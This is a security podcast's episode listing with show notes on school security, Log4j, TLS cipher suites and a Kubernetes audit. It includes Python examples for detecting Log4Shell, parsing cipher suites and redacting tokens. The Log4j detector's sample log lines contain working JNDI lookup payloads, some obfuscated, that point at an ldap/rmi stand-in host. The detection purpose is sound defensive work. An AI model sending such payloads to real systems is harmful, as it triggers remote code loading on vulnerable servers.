
BrakeSec Education Podcast (Bryan Brake, Amanda Berlin, and Brian Boettcher)
Explore all episodes of BrakeSec Education Podcast
Date | Title | Duration
---|---|---
29 Mar 2020 | 2020-012-April Mardock, Nathan McNulty, Jared Folkins, school security, ransomware attacks | 00:48:22
April Mardock - CISO - Seattle Public Schools
Jared Folkins - IT Engineer - Bend La Pine Schools
Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/ Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security persons at education institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets? Is money/budget the reason schools get the raw deal here? Why is ransomware such an appealing attack?
How complex is the school environment?
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
Is the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines?
Localadmins are not granted… (excellent!)
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
01 Jun 2024 | Tanya Janca Talks secure coding, Semgrep Academy, and community building, and more! | 01:27:18
Check out the BrakeSecEd Twitch at https://twitch.tv/brakesec Join the Discord! https://discord.gg/brakesec #youtube VOD (in 1440p): https://www.youtube.com/watch?v=axQWGyd79NM Questions and topics: Additional information / pertinent Links (Would you like to know more?):
03 Jan 2016 | 2016-001: Jay Schulmann explains how to use BSIMM in your environment | 01:02:17
#Jay #Schulman is a consultant with 15+ years of experience in helping organizations implement #BSIMM and other compliance frameworks. For our first #podcast of 2016, we invited him on to discuss it further and what he has found to be the best way to implement it in a company's #security #program.
Jay Schulman's #website: https://www.jayschulman.com/ Jay's Podcast "Building a Life and Career in Security" (iTunes): https://itunes.apple.com/us/podcast/building-life-career-in-security/id994550360?mt=2&ls=1 Jay's Twitter: https://twitter.com/jschulman
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Bryan's Twitter: http://www.twitter.com/bryanbrake Brian's Twitter: http://www.twitter.com/boettcherpwned Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com iTunes Link: https://itunes.apple.com/us/podcast/2016-001-jay-schulmann-explains/id799131292?i=360028388&mt=2 Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-001-JaySchulman-BSIMM.mp3
23 Dec 2021 | 2021-046-Mick Douglas, Log4j vulnerabilities, egress mitigations- part2 | 00:40:47
Introduction
Overview of the Log4j vuln (CVE-2021-44228, as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
Why wasn't this given the same visibility in 2009? Because it's Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don't know?
Egress traffic (discussed at length on twitter; what problems does it solve?) https://twitter.com/mubix/status/1470430085169745920
Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - Apache disabled JNDI lookups by default in 2.16.0
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about "SBOM solving the issue". @K8em0 weighs in: https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 - list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011 - "2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable" (OpenJDK…)
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 - You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue: 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 - the #Log4Shell attack vector was known since 2016…
"Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread."
When dealing with attacks like this you should remember the acronym IMMA: I = Isolate, M = Minimize, M = Monitor, A = Active Defense
https://github.com/MarkBaggett/srum-dump - "SRUM Dump extracts information from the System Resource Utilization Management Database and creates an Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind."
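The "Monitor" leg of IMMA, and the egress discussion, both start with knowing which requests actually carried a lookup string. The detector below is an added example, not from the episode, the quoted thread, or the Log4j project: it collapses the nested ${lower:}, ${upper:} and ${...:-x} lookups that attackers used to hide the string from a naive "${jndi:" grep, then matches the resulting ${jndi:<scheme>: prefix over a few constructed access-log lines (documentation-range IPs, invented requests). It emulates only the lookups that are useful for obfuscation, not the whole Log4j lookup engine, so a hit is a trigger to investigate (and to check egress logs for LDAP/RMI connections from that host), not proof of exploitation.

```python
"""Added example: spot Log4Shell-style JNDI lookups in web server logs,
including the nested-lookup obfuscations that defeat a naive '${jndi:' grep.
Constructed sample lines below; IPs are documentation ranges, not real hosts."""
import re
from typing import List, Optional, Tuple

# Innermost lookup: ${...} whose body contains no further ${ or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
# After de-obfuscation, the real thing: ${jndi:<scheme>:...
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one innermost Log4j lookup the way attackers rely on it.

    Only the lookups that are useful for hiding the string are emulated:
      ${lower:X} / ${upper:X}          -> case-folded X
      ${env:NOPE:-x}, ${::-x}, ...     -> the default value after ':-'
    A genuine ${jndi:...} is left intact so the caller can match on it.
    """
    low = body.lower()
    if low.startswith("jndi:"):
        return "${" + body + "}"
    if ":-" in body:                      # default-value syntax
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    return "${" + body + "}"              # unknown lookup (date, sys, ...): leave as-is


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, normalized_line) if the line carries a JNDI lookup."""
    norm = normalize(line)
    m = JNDI.search(norm)
    return (m.group(1).lower(), norm) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, scheme) for every line that decodes to a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found[0]))
    return hits


# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:13:01:09 +0000] "GET /login?u=${${lower:j}ndi:${lower:r}mi://203.0.113.7/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:13:02:41 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/z}"',
    '10.0.0.8 - - [10/Dec/2021:13:03:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:03:15 +0000] "GET / HTTP/1.1" 200 612 "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.7/q}" "-"',
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOGS):
        print(f"line {idx}: jndi lookup via {scheme} -> {find_jndi(SAMPLE_LOGS[idx])[1]}")
```

Run it over real access logs one line at a time; the normalized form it prints is what you hand to the analyst, since the raw line is often unreadable. The scheme (ldap, rmi, dns) tells you which outbound protocol to look for in egress logs.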
15 Mar 2015 | 2015-012-Fill In podcast with Jarrod and Lee! | 01:43:36
Mr. Boettcher went on vacation and was volunteering for Austin Bsides this week, and I needed to do a podcast, so I enlisted the aid of Lee Brotherston and Jarrod Frates to discuss some important topics. We discuss the seemingly short talent pool for IT/IS positions. We talk about the ROWHAMMER vulnerability and how it may affect your organization. Additionally, we talk about how the NTP protocol is being maintained by one person and what can be done to help with that, as it is a critical piece of Internet infrastructure, and finally, we figure out why PGP/GPG is not user-friendly, and if there are ways to make it better, or if it needs to be replaced permanently.
News of the week
http://www.darknet.org.uk/2015/03/rowhammer-ddr3-exploit-what-you-need-to-know/
http://www.informationweek.com/it-life/ntps-fate-hinges-on-father-time/d/d-id/1319432
28 Sep 2016 | 2016-038-Derbycon Audio and 2nd Annual Podcast with Podcasters! | 01:24:14
Mr. Brian Boettcher and I had a great time at DerbyCon. We met so many people and it really was excellent meeting all the fans who came up and said "Hello" or that they really enjoyed the #podcast. It is truly a labor of love and something that we hope everyone can learn something from.
We got some audio while at lunch at #Gordon #Biersch talking about log monitoring, inspired by @dualcore's #Anti-Forensics talk (http://www.irongeek.com/i.php?page=videos/derbycon6/310-anti-forensics-af-int0x80-of-dual-core), and how to evade log monitoring, with Mr. Brian Boettcher and Michael Gough. (shout-out to @mattifestation, @dualcore, @baywolf88, @carlos_perez)
We sat down with Mr. Osman (@surkatty) from the Sound Security Podcast (@SoundSec), who was a first time attendee to #DerbyCon. We get his thoughts about DerbyCon and what talks he enjoyed.
Finally, our 2nd Annual podcast with our fellow podcasters was on. We had it in Bill Gardner's room (ReBoot-It podcast) (@oncee), with Amanda Berlin (@infosystir) from #Hurricane #Labs Podcast, Jerry Bell (@MaliciousLink) from #Defensive #Security Podcast, Ben Heise (@benheise) from Rally #Security Podcast, Tim DeBlock (@TimothyDeBlock) from Exploring Information Security Podcast, and SciaticNerd (@sciaticnerd) from Security Endeavors podcast.
IronGeek's website has all the videos available here: http://www.irongeek.com/i.php?page=videos/derbycon6/mainlist
Whiskey Bent Valley Boys: http://whiskeybentvalley.tumblr.com/ or iTunes: https://itunes.apple.com/us/artist/whiskey-bent-valley-boys/id318874442
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-038-Derbycon_podcast.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-038-derbycon-audio-2nd/id799131292?i=1000375934157&mt=2 YouTube: https://www.youtube.com/watch?v=W7ylsfwGyhc
#SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
12 Jan 2022 | OSS sustainability, log4j fallout, developer damages own code-p1 | 00:43:47
Adam Baldwin (@adam_baldwin) Amélie Koran (@webjedi)
Log4j vulnerability
https://logging.apache.org/log4j/2.x/license.html https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/ https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS. https://twitter.com/BleepinComputer/status/1480182019854327808
Faker.js - https://www.npmjs.com/package/faker - Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/package/colors - get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/
Should OSS teams expect payment for giving their time/code away for free? What are their expectations
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, “Hobbyists” were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this)
03 May 2015 | 2015-020 - Deadly Programming Sins - Buffer Underruns | 00:38:05
Code audits are a necessary evil. Many organizations resort to using automated tools, but tools may not find all issues with code. Sometimes, you need to take a look at the code yourself. Mr. Boettcher and I begin going through the book "24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them". What we covered this week is "buffer overruns": we discuss what they are, and how they occur. Get ready for a crash course in code audits. The book is not required, but it definitely helps when we are discussing concepts. We also mentioned our new Patreon account, so if you are a listener, and want to support what we do, you can give on a per month schedule. Donations are entirely optional, and if you don't wish to give, that's fine too.
24 Deadly Sins on Amazon:
29 Apr 2018 | 2018-014- Container Security with Jay Beale | 01:05:30
Container security
Jay Beale @inguardians , @jaybeale
Containers
Difference between containers and sandboxing
Roll your own containers
Using public registries leaves you vulnerable; use your own private repos for deploying containers
Reduce attack surface
Reduce user access
Automation will allow more security to get baked in.
https://www.infoworld.com/article/3104030/security/5-keys-to-docker-container-security.html
https://blog.blackducksoftware.com/8-takeaways-nist-application-container-security-guide
https://www.vagrantup.com/downloads.html
https://www.vmware.com/products/thinapp.html
https://www.meetup.com/SEASec-East/events/249983387/
S3 buckets / Azure Blobs
https://docs.microsoft.com/en-us/azure/architecture/aws-professional/services
https://docs.aws.amazon.com/config/latest/developerguide/s3-bucket-policy.html
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
10 Dec 2015 | 2015-051-MITRE's ATT&CK Matrix | 00:48:23
#MITRE has a Matrix that classifies the various ways that your network can be compromised. It shows all the post-exploitation categories from 'Persistence' to 'Privilege Escalation'. It's a nice way to organize all the information. This week, Mr. Boettcher and I go over the "#Persistence" and "#Command and #Control" sections of the Matrix. Every person who attacks you has a specific method that they use to get and keep access to your systems; it's as unique as a fingerprint. Threat intelligence companies call it TTP (#Tactics, #Techniques, and #Procedures). We also discuss the Cyber #KillChain, and where it came from.
#ATT&CK Matrix: https://attack.mitre.org/wiki/Main_Page
Tactics, Techniques, and Procedures (shows patterns of behavior): https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf -- Cyber Kill Chain paper that inspired the ATT&CK Matrix
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-051-ATTACK_Matrix.mp3 iTunes: https://itunes.apple.com/us/podcast/2015-051-mitres-att-ck-matrix/id799131292?i=358670845&mt=2 TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com
20 Jun 2018 | 2018-021-TLS 1.3 discussion, Area41 report, wireshark goodness | 00:42:43
Area41 Zurich report
Book Club - 4th Tuesday of the month
https://www.owasp.org/images/d/d3/TLS_v1.3_Overview_OWASP_Final.pdf
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet
Breaking down a cipher suite name, e.g. TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (the notes had TLS_DHE_RSA_AES_256_GCM_SHA256, which is not a registered name: in the IANA registry the AES-256-GCM suites end in SHA384 and the AES-128-GCM suites in SHA256):
TLS = protocol
DHE = Diffie-Hellman ephemeral key exchange (provides forward secrecy, often called Perfect Forward Secrecy)
Forward secrecy = session keys are not compromised even if the server's long-term private key is; past sessions cannot be decrypted after the fact (https://en.wikipedia.org/wiki/Forward_secrecy)
RSA = signature algorithm used to authenticate the server's key exchange. In practice that is RSA or ECDSA (TLS 1.3 also allows EdDSA)
AES_256_GCM = bulk cipher and mode. GCM is an AEAD mode, so the record itself carries its authentication tag; no separate HMAC is applied
SHA384 = the hash for the TLS 1.2 PRF (and the HKDF hash in TLS 1.3 suites), not a record MAC. Only the older CBC suites, e.g. ..._AES_256_CBC_SHA256, use this field as the HMAC for record integrity (https://en.wikipedia.org/wiki/HMAC#Definition_.28from_RFC_2104.29)
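To make the decomposition above mechanical, the parser below is an added example, not from the OWASP cheat sheet or the episode. It takes IANA-registry names (TLS_<kx>_<auth>_WITH_<cipher>_<hash> for TLS 1.2 and earlier, TLS_<cipher>_<hash> for TLS 1.3), splits them into the parts discussed above, and applies a reviewer's own policy: forward secrecy, AEAD, an authenticated key exchange, no legacy ciphers or MACs. It refuses the unregistered spelling from the notes, which is the point of the last check in the test.

```python
"""Added example: decompose IANA-style TLS cipher suite names the way the
notes above do, and flag the properties a hardening review cares about.
Not from the OWASP cheat sheet or the episode; the assessments are the
reviewer's own policy (forward secrecy + AEAD, no legacy ciphers)."""
from dataclasses import dataclass
from typing import List, Optional

NO_PFS = "no forward secrecy (static key exchange)"
NO_AUTH = "no authentication (anonymous key exchange)"
NOT_AEAD = "not AEAD (CBC + separate HMAC)"
WEAK_CIPHER = "legacy/weak bulk cipher"
LEGACY_MAC = "legacy MAC (MD5 or SHA-1 HMAC)"

LEGACY_CIPHER_TOKENS = ("NULL", "RC4", "RC2", "DES", "3DES", "IDEA", "EXPORT")


@dataclass
class CipherSuite:
    name: str
    tls13: bool
    key_exchange: Optional[str]   # None in TLS 1.3: always (EC)DHE, negotiated separately
    auth: Optional[str]           # None in TLS 1.3: signature scheme negotiated separately
    cipher: str                   # bulk cipher and mode, e.g. AES_256_GCM
    hash: str                     # PRF/HKDF hash, or the HMAC hash for CBC suites

    @property
    def forward_secret(self) -> bool:
        return self.tls13 or self.key_exchange in ("DHE", "ECDHE")

    @property
    def aead(self) -> bool:
        return any(t in self.cipher for t in ("GCM", "CCM", "CHACHA20_POLY1305"))


def parse_suite(name: str) -> CipherSuite:
    if not name.startswith("TLS_"):
        raise ValueError(f"not an IANA cipher suite name: {name}")
    body = name[len("TLS_"):]
    if "_WITH_" in body:                       # TLS 1.2 and earlier
        kx_auth, rest = body.split("_WITH_", 1)
        parts = kx_auth.split("_")
        if len(parts) == 1:                    # e.g. TLS_RSA_WITH_...: RSA key transport
            kx, auth = parts[0], parts[0]
        else:                                  # e.g. DHE_RSA, ECDHE_ECDSA, DH_anon
            kx, auth = parts[0], parts[1]
        tls13 = False
    else:                                      # TLS 1.3: TLS_AES_256_GCM_SHA384
        if not body.startswith(("AES_", "CHACHA20_")):
            raise ValueError(f"not a registered TLS 1.3 or _WITH_ style name: {name}")
        kx, auth, rest, tls13 = None, None, body, True
    cipher, _, hash_ = rest.rpartition("_")
    return CipherSuite(name, tls13, kx, auth, cipher, hash_)


def looks_like_iana_name(name: str) -> bool:
    try:
        parse_suite(name)
        return True
    except ValueError:
        return False


def assess(name: str) -> List[str]:
    """Policy issues with a suite; an empty list means it passes."""
    s = parse_suite(name)
    issues = []
    if s.auth == "anon":
        issues.append(NO_AUTH)
    if not s.forward_secret:
        issues.append(NO_PFS)
    if not s.aead:
        issues.append(NOT_AEAD)
    if any(t in LEGACY_CIPHER_TOKENS for t in s.cipher.split("_")):
        issues.append(WEAK_CIPHER)
    if s.hash in ("MD5", "SHA"):              # bare "SHA" in suite names means SHA-1
        issues.append(LEGACY_MAC)
    return issues


if __name__ == "__main__":
    for n in ("TLS_DHE_RSA_WITH_AES_256_GCM_SHA384", "TLS_AES_128_GCM_SHA256",
              "TLS_RSA_WITH_AES_128_CBC_SHA", "TLS_ECDHE_RSA_WITH_RC4_128_SHA"):
        print(n, parse_suite(n), assess(n) or "ok")
```

OpenSSL spells the same suites differently (DHE-RSA-AES256-GCM-SHA384), which is what the OWASP cheat sheet strings use; map those to IANA names before feeding them in.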
https://en.wikipedia.org/wiki/Funicular
https://mozilla.github.io/server-side-tls/ssl-config-generator/?hsts=no
10 Oct 2015 | Derbycon Audio - post-Derby interviews! | 01:04:10
In our last bit of Derbycon audio, I discussed DerbyCon experiences with Mr. Boettcher, Magen Wu (@tottenkoph), Haydn Johnson (@haydnjohnson), and Ganesh Ramakrishnan (@hyperrphysics). We find out what they liked, what they didn't like, and you get a lot of great information about packing for a con and things you can do to improve your convention-going experience. Hopefully, you'll hear the amount of fun we had, and find the time to go to a convention. There are literally hundreds, many only a few hours by plane away. Some can be found in your own town or within driving distance.
31 Aug 2019 | 2019-032-kubernetes security audit dicussion with Jay Beale and Aaron Small | 00:47:13
Topics:
Derbycon Pizza Party (with podcast show!) https://www.eventbrite.com/e/brakesec-pizza-party-at-the-derbycon-mental-health-village-tickets-69219271705
Mental health village at Derbycon
Jay Beale (co-lead for audit) *Bust-a-Kube*
Aaron Small (product mgr at GKE/Google)
Atredis Partners
Trail of Bits
What was the Audit? How did it come about?
Who were the players?
Kubernetes Working Group: Aaron, Craig, Jay, Joel
Outside vendors: Atredis: Josh, Nathan Keltner; Trail of Bits: Stefan Edwards, Bobby Tonic, Dominik
Kubernetes Project Leads/Devs: interviewed devs -- this was much of the info that went into the threat model
Rapid Risk Assessments - let's put the GitHub repository in the show notes
What did it produce?
Vuln Report
Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf
White Papers: https://github.com/kubernetes/community/tree/master/wg-security-audit/findings
Discuss the results:
Threat model findings:
Controls silently fail, leading to a false sense of security (Pod Security Policies, egress network rules)
Audit model isn't strong enough for non-repudiation; by default, the API server doesn't log user movements through the system
TLS encryption weaknesses: most components accept cleartext HTTP; bootstrapping to add kubelets is particularly weak; multiple components do not check certificates and/or use self-signed certs; HTTPS isn't enforced; certificates are long-lived, with no revocation capability; etcd doesn't authenticate connections by default
Controllers all bundled together; confused deputy, because lower-privilege controllers are bundled in the same binary as higher-privilege ones
Secrets not encrypted at rest by default
etcd doesn't have signatures on its write-ahead log
DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes
Port 10255 has an unauthenticated HTTP server for status and health checking
Vulns / findings (not a complete list, but interesting):
Hostpath pod security policy bypass via persistent volumes
TOCTOU when moving PID to manager's group
Improperly patched directory traversal in kubectl cp
Bearer tokens revealed in logs
Lots of MitM risk: SSH not checking fingerprints (InsecureIgnoreHostKey); gRPC transport seems all set to WithInsecure(); HTTPS connections not checking certs; some HTTPS connections are unauthenticated
Output encoding on JSON construction (this might lead to further work, as JSON can get written to logs that may be consumed elsewhere)
Non-constant-time check on passwords
Lack of re-use / library-ification of code
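Two of the code-level findings above, bearer tokens revealed in logs and a non-constant-time password check, are not Kubernetes-specific and have short fixes. The snippet below is an added example written in Python, not code from the audit or from Kubernetes itself: it redacts bearer tokens to a short SHA-256 fingerprint before a line is logged, so operators can still correlate requests by token without ever storing the credential, and it contrasts the short-circuiting comparison with hmac.compare_digest. The log lines and the token are constructed.

```python
"""Added example, not from the Kubernetes audit or its code base: two of the
findings above are generic bugs that any service can have. (1) bearer tokens
written to logs, fixed by redacting them to a correlatable fingerprint before
the line is emitted; (2) a non-constant-time password check, fixed with
hmac.compare_digest. Sample log lines and tokens are constructed."""
import hashlib
import hmac
import re

# Bearer tokens use the RFC 6750 token68 alphabet; this matches that.
BEARER = re.compile(r"(?i)(bearer\s+)([A-Za-z0-9\-._~+/]+=*)")


def token_fingerprint(token: str) -> str:
    """Short SHA-256 prefix: lets operators correlate requests by token
    without ever storing the credential itself."""
    return hashlib.sha256(token.encode("utf-8")).hexdigest()[:12]


def redact_bearer(line: str) -> str:
    """Replace every bearer token in a log line with a fingerprint marker."""
    return BEARER.sub(lambda m: f"{m.group(1)}<redacted:{token_fingerprint(m.group(2))}>", line)


def check_password_insecure(supplied: str, expected: str) -> bool:
    # str == short-circuits at the first differing character, so the time
    # taken leaks how much of the prefix was right. This is the pattern the
    # audit flagged; it is here only for contrast.
    return supplied == expected


def check_password(supplied: str, expected: str) -> bool:
    # compare_digest runs in time independent of where the inputs differ
    # (for equal-length inputs; the length itself is not secret here).
    return hmac.compare_digest(supplied.encode("utf-8"), expected.encode("utf-8"))


# Constructed log lines; the token is a made-up value, not a real credential.
SAMPLE_LINES = [
    'I0831 10:12:03.123 apiserver: GET /api/v1/secrets authorization="Bearer eyJhbGciOiJSUzI1NiJ9.fake.payload" user=system:serviceaccount:kube-system:default',
    "I0831 10:12:04.001 kubelet: fetched config, no auth header",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(redact_bearer(line))
    print(check_password("hunter2", "hunter2"), check_password("hunter2", "hunter3"))
```

Wire redact_bearer in as a logging filter rather than calling it at each log site; the point of the finding is that the one site somebody forgets is the one that leaks.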
Who will use these findings and how? Devs, google, bad guys? Any new audit tools created from this?
Brad geesaman “Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec https://www.youtube.com/watch?v=vTgQLzeBfRU
Aaron Small: https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster
CNCF: https://www.youtube.com/watch?v=90kZRyPcRZw
Findings:
Scope for testing:
Source code review (what languages did they have to review?) Golang, shell, ...
Networking (discuss the networking: *internal*, *external*)
Cryptography (TLS, data stores)
AuthN/AuthZ
RBAC (which roles were tested? Just admin/non-admin? *best practice is no admin / least privilege*)
Secrets
Namespace traversals
Namespace claims
Methodology:
Set up a bunch of environments? Primarily set up a single environment, IIRC
Combination of code audit and active ?fuzzing? What does one fuzz on a K8s environment?
Tested with latest alpha or production versions? Version 1.13 or 1.14 - version locked at whatever was current. K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.
Tested multiple different types of k8s implementations? Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)
Bug Bounty program: https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md
04 Mar 2014 | Episode 7, Part 1 - Kevin Johnson of SecureIdeas! | 00:38:23
During our SEC542, GIAC Web App Pentesting course, we got the pleasure and honor of sitting down with Kevin Johnson from SecureIdeas on who he is, how Samurai WTF came into being, and why we should be doing licensing for proper ethical hackers.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
01 Jun 2014 | It all goes in "the cloud" (Part 1) | 00:36:24
Brian and I interviewed Mr. Guillaume Ross (@gepeto42), an Information Security professional who helps organizations get themselves situated into cloud based solutions. We get a better understanding of why people would want to put their info into the 'cloud' and how they are different than traditional co-lo and datacenters.
Guillaume's Blog: http://blog.binaryfactory.ca/
AWS (amazon) Security Best Practices WhitePaper: http://aws.amazon.com/whitepapers/aws-security-best-practices/ Amazon EC2 FAQ: http://aws.amazon.com/ec2/faqs/ Microsoft's Azure FAQ:http://azure.microsoft.com/en-us/support/faq/?rnd=1
"cloud computing icon" courtesy of smartdatacollective.com
